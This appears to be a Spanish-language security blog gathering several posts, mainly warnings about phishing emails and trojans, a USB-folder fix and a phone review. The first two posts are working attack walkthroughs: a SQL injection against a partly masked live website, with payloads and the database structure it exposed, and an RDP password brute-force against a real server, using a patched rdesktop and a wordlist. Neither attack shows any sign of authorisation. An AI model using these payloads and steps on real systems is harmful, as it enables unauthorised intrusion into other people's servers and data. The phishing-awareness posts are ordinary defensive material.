Webmedia SQL Injection

Esta aplicacion web presenta una vulnerabilidad de tipo SQL Injection.

Realizamos una PoC de esta vulnerabilidad.

http://www.xxxxxxxxxxx.com/news_body.php?id=99

http://www.xxxxxxxxxxx.com/news_body.php?id='99

http://www.xxxxxxxxxxx.com/news_body.php?id=18' AND 5946=5946

http://www.xxxxxxxxxxx.com/news_body.php?id=-5946'

UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR
(58,98,107,118,58),IFNULL(CAST(CHAR(100,87,84,70,98,77,78,84,105,97)
AS CHAR),CHAR(32)),CHAR(58,120,118,111,58)), NULL, NULL, NULL,
NULL# AND 'MNHP'='MNHP

Efectivamente, el parametro ‘id’ de tipo GET es vulnerable

Realizando el ataque se pueden obtener algunos datos importantes como:

web server operating system: Linux CentOS
web application technology: Apache 2.0.63, PHP 5.1.6
Motor Base de Datos: MySQL 5.0.11
El nombre de la base de datos: trxxxxxeme_com

y acceder a algunas tablas de la DB

[4 tables]
+-----------+
| xxxnds   |
| content   |
| xxxxxfeed |
| products |
+-----------+

Table: products
[5 columns]
+---------+---------------+
| Column | Type |
+---------+---------------+
| bag     | varchar(xxx) |
| brandID | int(11)       |
| name    | varchar(xxx) |
| price   | decimal(xx,2) |
| pxxxID  | int(xx)       |
+---------+---------------+

Recuperando carpetas ocultas en un Pendrive

Seguramente a muchos les ha traido mas de un dolor de cabeza aquellos ‘virus’ que infectan las memorias USB (pendrive) cuando lo usamos en alguna cabina internet , la oficina o la universidad.

Pues bien, se ha hecho regular que al descubrir que dichas carpetas están con atrubutos de oculto y sólo lectura, estas propiedades no se les puede cambiar desde el explorador de Windows, algunos recurren al winrar para visualizar sus archivos.

La solución es bastante rápida.

Abrir una consola de MS-DOS, ubicarte en la carpeta o directorio que contiene las carpetas que estan ocultas.

Escribir en la linea de comandos:

>attrib -h -s -r *.* /s /d

y listo todas las carpetas se habrán restablecido las carpetas.

donde:

-h para quitar el atributo de oculto
-s para quitar el atributo de archivo de sistema
-r para quitar el atributo de solo lectura

/s realiza la acción en los archivos contenidos en la carpeta actual y las subcarpetas.
/d realiza la accion en directorios o carpetas

Cracking pass of MS Terminal Server

Hace unas semanas escaneaba un Web Server y me sorprendí al ver que tenía muchos puertos abiertos, 110, 21, 22 25, 443, 3389, 80, 993, 995 realmente para publicitarse como una empresa sería y segura no creí que tenga un buen esquema de seguridad con muchos servicios y puertos abiertos en un mismo Server.

Decidí probar con el 3389 de Terminal Server para saber si soportaba conexión remota a través de mi conexión ADSL, pues si soportaba, solo hacía falta saber la contraseña.

Atacando al RDP MS Terminal Server usando Backtrack 4

1. Actualizamos y parchamos Rdesktop.

Descargamos:

Rdesktop 1.5
http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.5.0.tar.gz

RDP Brute force patch r805
http://www.foofus.net/jmk/tools/rdp-brute-force-r805.diff

Creamos una carpeta para las descargas

mkdir rdesk

A continuación, descomprimimos.

tar -xvzf rdesktop-1.5.0.tar.gz
cd rdesktop-1.5.0

Parchamos rdesktop para que pueda hacer el ataque de fuerza bruta

root@bt:~/rdesk/rdesktop-1.5.0# patch -p1 -i rdp-brute-force-r805.diff
patching file Makefile.in
patching file configure
patching file orders.c
patching file orders.h
patching file rdesktop.c
patching file rdesktop.h
patching file rdp.c
patching file secure.c
patching file xkeymap.c

Compilamos e instalamos

./configure
make
make install

Ahora ya tenemos la nueva versión de rdesktop lista para hacer el ataque

2. Realizando el ataque

En la línea de comandos escribimos:

#rdesktop -n Administrador -p /ruta/wordlist.lst 72.28.xxx.xxx

Samsung i9000 Galaxy S

Hace bastante tiempo que no posteaba, el trabajo, los negocios, en fin.

Mi post esta dirigido exclusivamente en el tema Samsung, recuerdo hace algunos años cuando esta marca me era bastante lejana, incluso lo relacionaba con productos de mala calidad y sutilmente me referia a ella como ‘Chanchung’, han pasado ya bastantes años y veo con mucho entusiasmo que dicha empresa esta liderando el desarrollo tecnologico.

Cosas del destino, me crearan que ahora tengo una camara digital Sansung?, si, esas del gorila tomandose las fotos, camara con 2 pantallas, esa misma, es multitouch y toda la cosa, aunque tiene un lente Schneider-Kreuznach aun sigo extrañando mi antigua Canon Powershot.

Algo que me sorprendio hace unas semanas es el modelo i9000 Galaxy S, wow!!! no es eso un iphone? fue lo que me dije, pero al leer un poco de este gadget resulto toda una caja de pandora y algo que quiero se;alar es que le vino bien a Samsung en ponerse la camiseta Android. Personalmente hasta ahora nunca habia comprado un movil de esa marca sencillamente porque tenia un sistema operativo ‘cerrado’ no habia aplicaciones para essos equipos cosa que con Symbian encontrabas a montones y como ven, con la masificacion de Android Samsung se esta conviertiendo en lider desarrollo de tecnologia en moviles y cada vez va en aumento sus ventas de equipos. Nokia y SE que eran los antiguos lideres ven disminuir sus ventas mientras que Samsung y hasta el propio LG van en aumento.

Review:

El Samsung I9000 Galaxy S pose:

• Pantalla WVGA Super AMOLED de 4 pulgadas,
• Procesador de 1GHz
• Sistema operativo Android 2.1.
• Cámara de 5MP con grabación de video HD 720p a 30 fps
• 3G, Wi-Fi, A-GPS, reproducción de video HD y varios otros formatos como FLAC y MKV.
• Dimensiones: 122.4 x 64.2 x 9.9 mm
• Pantalla MultitouchPeso. 118g
• 16Gb de memoria interna
• Bateria litio-ion de 1500mAh

Sin dudas es un buen equipo.

Falso mensaje twitter vende viagra

Un correo supuesto del soporte de twitter nos redirige a una pagina web de venta de viagra.

Al presionar el enlace, nos redirige a:
httx://kivaeast.com/midstream.html 

y este a su vez, redirige hacía la página web de venta de viagra:
httx://joincalm.com

Interbank, Falso correo de Verificación Urgente de Datos

Hace unos días descubrí en mi bandeja de correo un mensaje con los siguientes datos,

Asunto: Verificación Urgente de Datos por Motivos de Seguridad.‏
Desde: Banco Interbank (noreply@sonico.com)

Para empezar no tengo cuentas en dicho banco, en segundo lugar Interbank no tiene como dominio de correo electrónico @sonico.com y ahí la señal de que se trataba de un fraude.

El contenido de dicho correo es como sigue:

ESTIMADO CLIENTE :

La importancia por la seguridad e integridad de nuestros servicios hemos decidido enviarle el siguiente mensaje de alerta en el cual le comunicamos que debido a los reiterados robos informaticos, el banco a puesto a disposicion a todos sus clientes la nueva banca celular.

!Ingresa a su banca para acceder al sistema de banca celular! desde aki :

http://www.grrr.ws/escola/inscrits/css/NetActiva/www.interbank.com.pe/

 Creo que lo errores saltan a la vista, un banco formal no escribe ‘desde aki :’

Es así que decido investigar pero no tuve la suerte de ver el comportamiento o lo que dicho enlace hacía, al parecer ya lo han reportado y esta fuera de línea.

He aquí la cabecera del correo.

X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0xO0Q9MTtTQ0w9MA==
X-Message-Status: n:0
X-SID-PRA: Banco Interbank noreply@sonico.com
X-AUTH-Result: NONE
X-Message-Info: R00BdL5giqqKCD/Wy0S2cY0xYtL/iwmX0lfiw24IiEeFn2
tAeTOaTUhcognDtSbAKP/RFfqyLVDrxxyomHSPN1ANmrNScx2A
Received: from moutng.kundenserver.de ([212.227.17.9]) by
BAY0-MC1-F35.Bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
         Mon, 12 Apr 2010 09:35:23 -0700
Received: from infong-es27.kundenserver.de
(infong-es27.1and1.es [212.227.114.95])
        by mrelayeu.kundenserver.de (node=mreu1) with ESMTP (Nemesis)
        id 0LnFph-1NZjtO0SwX-00hbRr; Mon, 12 Apr 2010 18:35:23 +0200
Received: from 186.160.53.202 (IP may be forged by CGI script)
    by infong-es27.kundenserver.de with HTTP
    id 4AgApW-1O1Mba3dD6-00078c; Mon, 12 Apr 2010 18:35:22 +0200
X-Sender-Info: 264167517@infong-es27.kundenserver.de
Date: Mon, 12 Apr 2010 18:35:22 +0200
Precedence: bulk
X-Apache-Env: www-ip="MTg2LjE2MC41My4yMDI=";helo="aW5mb25nLWVzMj
 cua3VuZGVuc2VydmVyLmRl";script="L2pzL3h6LnBocA=="
To: xxxxxx@hotmail.com
Subject: Verificación Urgente de Datos por Motivos de Seguridad.
From: Banco Interbank noreply@sonico.com
Message-Id: 1307462764.129@sonico.com
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-Provags-ID: V01U2FsdGVkX195DS7ibZzuMFH1v60nWbxywCtm7kaZyq7WoT2
 f64v457yiktsr/4kVE9Sb77sPM/gCQGRs1DhoFamksspmPZN6g
 0HGXj6/RbU=
Return-Path: noreply@sonico.com
X-OriginalArrivalTime: 12 Apr 2010 16:35:24.0171 (UTC)
FILETIME=[268805B0:01CADA5E] 

Un Segundo correo esta vez con los siguientes datos,

 De: Interbank.com.pe (Servicioalcliente@interbank.com.pe)
Asunto: Verificación Urgente de Datos por Motivos de Seguridad.‏

Contenido:

CUENTA SUSPENDIDA

Estimado Cliente:

Le hacemos llegar una notificación debido a que su cuenta Interbank ha sido Suspendia por que su correo electronico no esta registrado debidamente en nuestra banca por Internet.

El registro Activará automaticamente su cuenta!.

El enlace fraudulento es:
http://aditivos.com.sv/includes/fileman/includes/www.interbank.com.pe/index.shtml

He aquí la cabecera, 

X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MTtTQ0w9Mg==
X-Message-Status: n:0
X-SID-PRA: Interbank.com.pe <Servicioalcliente@interbank.com.pe>
X-AUTH-Result: NONE
X-Message-Info: JGTYoYF78jEJRemogB0DrG8U7Uonnp59cA3w0GZq6yITpF7E
o3vl4gctGis75uynABblIcNI5LYgl7vHWUxrICWaBxQEFSub
Received: from quad.bahiaservers.com ([64.22.110.26]) by
SNT0-MC3-F37.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
         Thu, 1 Apr 2010 19:59:32 -0700
Received: from nobody by quad.bahiaservers.com with local (Exim 4.69)
        (envelope-from <nobody@quad.bahiaservers.com>)
        id 1NxX6X-0007aG-0H
        for xxxxxx@hotmail.com; Thu, 01 Apr 2010 23:59:29 -0300
To: xxxxxx@hotmail.com
Subject: Verificación Urgente de Datos por Motivos de Seguridad.
From: Interbank.com.pe <Servicioalcliente@interbank.com.pe>
Message-Id: <130746321.129@interbank.com.pe>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Date: Thu, 01 Apr 2010 23:59:29 -0300
X-AntiAbuse: This header was added to track abuse,
please include it with any abuse report
X-AntiAbuse: Primary Hostname - quad.bahiaservers.com
X-AntiAbuse: Original Domain - hotmail.com
X-AntiAbuse: Originator/Caller UID/GID - [99 32003] / [47 12]
X-AntiAbuse: Sender Address Domain - quad.bahiaservers.com
X-Source:
X-Source-Args: /usr/local/apache/bin/httpd -DSSL
X-Source-Dir: cadenaintegracion.com.ar:/public_html/images
Return-Path: nobody@quad.bahiaservers.com
X-OriginalArrivalTime: 02 Apr 2010 02:59:32.0788 (UTC)
FILETIME=[851A3F40:01CAD210]
 

Cuidado!! Falso virus, Cta gestion: Alerta Virus

Esta es tal vez la forma mas burda de phishing pero si es usada es por que las victimas pican el anzuelo.

Envían un correo electrónico con las siguientes características:

Asunto: Cta gestion: Alerta Virus Origen: correo electronic (correo.electronico@web.com) Contenido:   DGTFX Un virus ha sido detectado en sus carpetas. La cuenta de correo tiene que ser actualizado a nuestro nuevo Asegurado contra DGTFX virus de la versión 2010 para evitar que daños y perjuicios a nuestro registro de correo web y archivos de yourimportant.   Haga clic en la pestaña respuesta, Rellenar las columnas de abajo y envíalode espalda o de su cuenta de correo electrónico se pondrá fin de evitarpropagación del virus.   NOMBRE DE USUARIO: CONTRASEÑA: NÚMERO DE TELÉFONO: FECHA DE NACIMIENTO:   Director Técnico de la Web Team.Note que su contraseñase cifrará with1024-bit RSA claves para su contraseña de seguridad.

Tengan cuidado, los correos y formulario de empresas formales no solicitan contraseñas, así que al ver este correo en sus bandejas de entrada o bandeja de correo no deseado, simplemente ELIMINENLO.

Alerta usuarios de Facebook, troyano a la vista

Si reciben un correo a nombre del servicio de atención al cliente de Facebook en el que se anuncia que han cambiado tu contraseña por razones de seguridad y te adjuntan un archivo .Zip donde supuestamente está tu nueva contraseña…… No lo abras, elimínalo.

En lugar de la nueva contraseña encontrarás un archivo contiendo el troyano Trojan.Dropper.Oficla.G. Este troyano instala un backdoor en el equipo el cual permite al atacante controlar remotamente el ordenador y acceder a tu sistema.

Una vez teniendo el control de tu equipo los atacantes pueden infectar tu equipo con otras variantes u otro tipo de malware lo que les asegurará mantener el control total sobre tu sistema.

Extraído de: DiarioTI

Antivirus paralizó Windows

Una actualización defectuosa hizo que el antivirus BitDefender trasladara diversos archivos de Windows (64-bit) a cuarentena, debido a que la actualización considera que están infectados por el malware “Trojan.FakeAlert.5″.

El foro de usuarios de BitDefender estuvo durante el fin de semana colmado de indignados comentarios. Uno de los frustrados usuarios comenta que todo archivo que intenta ser ejecutado, incluyendo el explorador de Windows y las actualizaciones del propio BitDefender eran puestas en cuarentena.

BitDefender admite en su blog que el error resultó, en algunos sistemas, en que algunos programas dejaran de funcionar y que incluso Windows no pudiera ser iniciado.

La empresa reaccionó con rapidez y a las 07:00 hrs. del domingo 21 de marzo había publicado un parche reparador para la versión 2010 de BitDefender. El parche para la versión 2009 será publicada lo antes posible, informa la empresa.

Bitdefender ha publicado en su web 2 comunicados al respecto.

Problema con Actualización: Trojan.FakeAlert.5.
Carta abierta a los usuarios de BitDefender.

Extraido de: DiarioTI

Cuidado con esos enlaces cortos

Ahora que están de moda los sistemas de microblogging o mensajes cortos (twitter, facebook, etc) y el crecimiento del uso de los enlaces cortos me surgió una pregunta, acaso son seguros estos sistemas que acortan los enlaces, acaso estaré seguro de no acceder a algún enlace malicioso (autenticación).

Decidí buscar más información al respecto y grande fue mi sorpresa cuando iba encontrando algunos blogs que hablan del tema.

http://usemoslinux.blogspot.com/…/los-enlaces-cortos-esconden-peligros-de.html

http://www.elpais.com/articulo/…/20100121elpcibpor_7/Tes/

La cierto es que al hacer clic sobre un enlace corto no podemos saber el destino de éste, es un albur el destino, no sabemos si nos dirigirá a otro blog, alguna Web de noticias, o quizá y por qué no decirlo, a algún enlace malicioso conteniendo malware, este último es muy peligroso porque puede ser un software malicioso usado para hacer phishing y si así fuera sí que estamos en problemas.

Las costumbres actuales de los usuarios de twitter y facebook hacen que con total confianza presionen en cuanto enlace corto se publique en estas redes sociales, hay una gran probabilidad que dicho enlace haya introducido malware (que hace phishing) en tu computadora y el atacante sepa (haya robado) con seguridad tu contraseña de correo-e y tus nros de tarjetas de crédito. Esto es muy peligroso, si tiene acceso a tus contraseñas, tiene acceso a toda tu información de índole personal, a tus contactos en facebook, fotografías privadas, a las actividades que realizas en el día a día y ésto es muy preocupante; en mi país los delincuentes usan este tipo de información para extorsionar, chantajear y hasta secuestrar a sus víctimas.

===============================================
Uno de los gusanos más famosos de las redes sociales, KoobFace, utiliza Bit.ly cuando se envía a todos los contactos de su víctima, o publica en su Twitter que tiene un vídeo que puede verse en un enlace corto y que infectará a quien lo visite. Otro gusano, ZeuS, ha usado TinyURL para propagarse”.
===============================================

Como paliativo AVG tiene una aplicación que verifica los enlaces antes de acceder a ellos, aunque seamos realistas los virus actúan antes que los antivirus los detecten o tengan firmas digitales de ellos.

http://linkscanner.avg.com

Es bastante difícil ir contra la corriente pero no sería mala idea de iniciar una campaña para disminuir los ‘enlaces cortos’